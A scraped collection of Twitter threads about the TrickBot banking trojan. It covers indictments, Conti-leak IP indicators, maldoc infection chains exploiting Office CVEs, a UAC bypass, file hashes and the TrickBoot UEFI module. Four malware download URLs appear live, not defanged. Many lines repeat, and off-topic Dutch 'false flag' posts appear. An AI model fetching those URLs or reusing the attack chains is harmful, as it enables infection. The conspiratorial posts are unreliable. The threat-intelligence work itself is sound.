Discover and read the best of Twitter Threads about #TrickBot
Most recents (17)
Short 🧵on Trickbot. Vitaly Kovalev's (aka "Bentley") indictment was originally filed 13 years go. It shows: 1) He was ID'd IRL long ago 2) Name and shame is now favored and 3) Maybe more old sealed indictments will be released? #infosec
US alleges Trickbot actors "are associated with Russian Intelligence Services." Conti leaks and other tidbits and data over the years pointed to potential ties between the state and cybercriminals. home.treasury.gov/news/press-rel… #infosec
Buried lead: Samanage was an Israeli startup full of Unit 8200 prior to merging with SolarWinds. 
Samanage was an Israeli startup full of Unit 8200 prior to merging with SolarWinds.
Samanage was an Israeli startup full of Unit 8200 prior to merging with SolarWinds.
The #ContiLeaks contained some messages consisting of IP:Username:pass combinations for #Conti infrastructure.
This allows us to connect certain #Trickbot activcity with the #Conti group:
1/x
This allows us to connect certain #Trickbot activcity with the #Conti group:
1/x
The IP's in the image are the following:
117.252.69[.]134
117.252.68[.]15
116.206.153[.]212
103.78.13[.]150
103.47.170[.]131
103.47.170[.]130
118.91.190[.]42
117.197.41[.]36
117.222.63[.]77
117.252.69[.]210
2/x
117.252.69[.]134
117.252.68[.]15
116.206.153[.]212
103.78.13[.]150
103.47.170[.]131
103.47.170[.]130
118.91.190[.]42
117.197.41[.]36
117.222.63[.]77
117.252.69[.]210
2/x
Using @MaltegoHQ together with OTX/Alienvault and
@virustotal integration, we are able to connect several of these IP's to #Trickbot activity:
3/x
@virustotal integration, we are able to connect several of these IP's to #Trickbot activity:
3/x
Interesting #maldoc
#TrickBot is distributed using a maldoc that uses #Emotet Template:
Process:
- It drops a small dll (1.xml) and executes its by creating an Outlook instance that calls rundll to execute 1.xml
- Drops a PS file and executes it
- Downloads and executes TrickBot
#TrickBot is distributed using a maldoc that uses #Emotet Template:
Process:
- It drops a small dll (1.xml) and executes its by creating an Outlook instance that calls rundll to execute 1.xml
- Drops a PS file and executes it
- Downloads and executes TrickBot
Maldoc:
b2859b4165a3047632174c1cd26b6756
1.xml:
8de70541621842ae7e3e6e21b41ee155
TrickBot download urls:
http://91.92.109.142/wolf.png
http://192.99.255.33/images/wolf.png
http://83.138.53.103/images/wolf.png
http://172.96.189.216/images/wolf.png
b2859b4165a3047632174c1cd26b6756
1.xml:
8de70541621842ae7e3e6e21b41ee155
TrickBot download urls:
http://91.92.109.142/wolf.png
http://192.99.255.33/images/wolf.png
http://83.138.53.103/images/wolf.png
http://172.96.189.216/images/wolf.png
TrickBot:
ad5ad0ce03a4de9de5829cdf2ec78d59
b4dcf8f35e2ba2fa4af1ec6c95d4c179
efaf7ddf9bc9398f18c76bf16e23755e
ff1f685e2a3381d277e71580e1166b06
a051cc64e345d440606d3c28463b8f95
ad5ad0ce03a4de9de5829cdf2ec78d59
b4dcf8f35e2ba2fa4af1ec6c95d4c179
efaf7ddf9bc9398f18c76bf16e23755e
ff1f685e2a3381d277e71580e1166b06
a051cc64e345d440606d3c28463b8f95
ICYMI, @PwC_UK’s 2020 #threatintel Year in Retrospect report is out now! All team contributed but h/t to @KystleM_Reid! :fire: You can check it out here: pwc.to/2ZPx7fo In this thread, I will summarise some of what I thought were key findings: 🧵👇 1/n
#Ransomware has become the most significant cyber security threat faced by organisations, irrespective of industry/location. TTPs have pivoted to mass data exfiltration prior to encryption, along with leaks & extortion. S/o to @andyp346 for all your work countering this.🙏 2/n
In 2020, 86% of the incidents that PwC’s Incident Response team responded to were attributable to cyber criminals. 79% of leaks happened in 2nd half of 2020. Our data sees Manufacturing, TMT, & Professional Services most impacted. 3/n
Happening NOW! You can still join us here, and I'll be live-tweeting what @Robert_Lipovsky and @adorais share. sans.org/webcasts/star-…
.@Robert_Lipovsky kicking off with something I believe as well...crimeware is a greater threat to most orgs than state-sponsored threats. Even this week!
Many cyber crimes involve different jurisdictions - rarely is adversary infrastructure all in the same country, so law enforcement and private industry have to cooperate globally.
2020-12-03:🔥 And ... [Major Discovery] 🤖"Persist, Brick, Profit -#TrickBot Offers New “#TrickBoot” UEFI-Focused Functionality"
🆕*First* Time Crimeware Group Pursued UEFI Firmware Exploitation | #YARA+IOCs in MISP JSON/CSV
@eclypsium | @IntelAdvanced
advanced-intel.com/post/persist-b…
🆕*First* Time Crimeware Group Pursued UEFI Firmware Exploitation | #YARA+IOCs in MISP JSON/CSV
@eclypsium | @IntelAdvanced
advanced-intel.com/post/persist-b…
📚:
1⃣TrickBoot is only one line of code away from being able to brick any device it finds to be vulnerable.
2⃣Historically, TrickBot actors have needed to evade and persist at the OS level - now a chance at UEFI level.
3⃣Actors are going lower in the stack to avoid detection.
1⃣TrickBoot is only one line of code away from being able to brick any device it finds to be vulnerable.
2⃣Historically, TrickBot actors have needed to evade and persist at the OS level - now a chance at UEFI level.
3⃣Actors are going lower in the stack to avoid detection.
✅Evolution of criminal intent:
⚓️Deep persistence achieved via UEFI/BIOS level to survive long-term on the host
⚡️New Incident Response Paradigm Shift:
*Firmware integrity checks might be particularly important for device that is known to have been compromised by TrickBot.*
⚓️Deep persistence achieved via UEFI/BIOS level to survive long-term on the host
⚡️New Incident Response Paradigm Shift:
*Firmware integrity checks might be particularly important for device that is known to have been compromised by TrickBot.*
🚨 We have a credible report of an imminent #cyber threat to the #healthcare industry: go.usa.gov/x7jKz
Some facilities have already been infected with ransomware over the last week. Here’s what we know. (1/4)
Some facilities have already been infected with ransomware over the last week. Here’s what we know. (1/4)
Since 2016, the cybercriminal enterprise behind #Trickbot, #Ryuk, and other ransomware tools have continued to develop new functionality and tools increasing the ease, speed, and profitability of victimization. (2/4)
What began as a banking trojan and descendant of #Dyre malware, now provides its operators a full suite of tools to conduct a myriad of illegal cyber activities. (3/4)
Een onderwerp waar NL media zich niet aan durfden te branden #niet_in_journaal #nieuwsuur #1V #OP #bbvpro #NPOradio1 #CBRNe #UNSC #OPWC #Syria #Douma #false_flag
#niet_in_journaal #nieuwsuur #1V #OP1 #bbvpro #NPOradio1 #Google #police #surveillance dailymail.co.uk/news/article-8…
Herinnert u zich nog de laatste reportage over Mozambique? #niet_in_journaal #nieuwsuur #1V #Op1 #bbvpro #NPOradio1 #Mozambique #global_jihad voanews.com/extremism-watc…
"salesforce.docx" uploaded yesterday
Low static detection (4/60): virustotal.com/gui/file/17f73…
Embedded executable "salesforce_report.exe"
• election-themed PE data
• CMSTPLUA UAC bypass
• probably #Trickbot 🤹🏽♂️🤖
• comms with: 181.112.157[.]42:449 (that cert 👀) & 193.26.217[.]243
Low static detection (4/60): virustotal.com/gui/file/17f73…
Embedded executable "salesforce_report.exe"
• election-themed PE data
• CMSTPLUA UAC bypass
• probably #Trickbot 🤹🏽♂️🤖
• comms with: 181.112.157[.]42:449 (that cert 👀) & 193.26.217[.]243
"salesforce.docx"
MD5: ab284dccb09484ff6a3a116152edcb75
"salesforce_report.exe"
MD5: 3e0aff10a361a752ab160228410f2432
<Not on VT>
I've shared here:
• @anyrun_app: app.any.run/tasks/02c2ef89…
• @virusbay_io: beta.virusbay.io/sample/browse/…
MD5: ab284dccb09484ff6a3a116152edcb75
"salesforce_report.exe"
MD5: 3e0aff10a361a752ab160228410f2432
<Not on VT>
I've shared here:
• @anyrun_app: app.any.run/tasks/02c2ef89…
• @virusbay_io: beta.virusbay.io/sample/browse/…
@anyrun_app @virusbay_io I think this fresh sample uses the old CMSTPLUA UAC bypass from @hFireF0X: gist.github.com/hfiref0x/196af… (blast from the past!)
Personally, I haven't done much #Trickbot binary triage - so I don't know how/what else to extract (like configs, campaign codes).
Personally, I haven't done much #Trickbot binary triage - so I don't know how/what else to extract (like configs, campaign codes).
1/6
Based on the evidence published, some bullets in Everis case:
#Ryuk not was involved, the ransome note is different.
#Ryuk/#Bitpaymer take long time to been deployed.
#Ryuk has been saw in combination of #Emotet->#Trickbot.
Based on the evidence published, some bullets in Everis case:
#Ryuk not was involved, the ransome note is different.
#Ryuk/#Bitpaymer take long time to been deployed.
#Ryuk has been saw in combination of #Emotet->#Trickbot.
2/6
0day Bonjour Updater
Oct 10, Morphisec published “the abuse of an Apple zero-day vulnerability in the Apple Software Update utility that comes packaged with iTunes for Windows” , related with #Bitpaymer adversaries.
0day Bonjour Updater
Oct 10, Morphisec published “the abuse of an Apple zero-day vulnerability in the Apple Software Update utility that comes packaged with iTunes for Windows” , related with #Bitpaymer adversaries.
3/6
BlueKeep
Over the weekend @GossiTheDog, report that his honeypot saw activity related with Bluekeep, working with @MalwareTechBlog they found that the final payload is a #MoneroMiner. Some IOC's shared today are related with this activity.
BlueKeep
Over the weekend @GossiTheDog, report that his honeypot saw activity related with Bluekeep, working with @MalwareTechBlog they found that the final payload is a #MoneroMiner. Some IOC's shared today are related with this activity.
Today we’re seeing a massive "Incoming transfer" spam campaign. The email body is blank, but the attachment is a document with malicious PowerShell that connects to malicious URLs to download a new variant of banking Trojan #Totbrick (#Trickbot).
Microsoft Word opens the document in Protected View, hence the instructions to "unlock the document" by clicking "Enable Editing". Don't! (SHA-256: 12dbd0cba4d5caf353f57a5d31ebb14d56d71ff410d58ef69391724ffef3002f, 7ea2df3db0c33dcca5a5634d6433f42d0ea4d9e0a23b865f27b39994cc20c4a3)
Windows Defender AV detects and blocks the document as TrojanDownloader:O97M/Powdow.KE. The payload is detected and blocked as Trojan:Win32/Totbrick (SHA-256: fc259872826dbe0cf623abbb2e886e4d877641add6d41b0121c121ade916c446)
As researchers like @dvk01uk noted, multiple spam campaigns are delivering malicious document attachments that exploit several vulnerabilities to install banking trojan #Trickbot. The spam emails spoof several banks, including Barclays and Scotiabank.
The attachment is a malicious .docx file that exploits CVE-2017-0199 to download a malicious .rtf, which in turn exploits CVE-2017-8570 to drop a malicious PowerShell, and CVE-2017-11882 to run the said PowerShell, which downloads #Trickbot.
Protected view can prevent automatic execution of malicious documents. Office365 ATP blocks the malicious emails. Windows Defender AV blocks malicious documents and payload. Attack surface reduction in Windows Defender Exploit Guard can also help protect. blogs.technet.microsoft.com/secguide/2018/…
Online banking #Trojan #TrickBot once again the payload of new #spam campaign; watch out for these emails in French
Attachment is script downloader; SHA256: 5ad6ef9af53e80604996e81279f075ff190eadcc3d163ace238cd9dca6840ffd
Payload is Trojan:Win32/TrickBot.A; SHA256: 16d8c3a87e5afe7224f255e32e9b99b97eaa0306f6e06e81f78ea13fbd042693
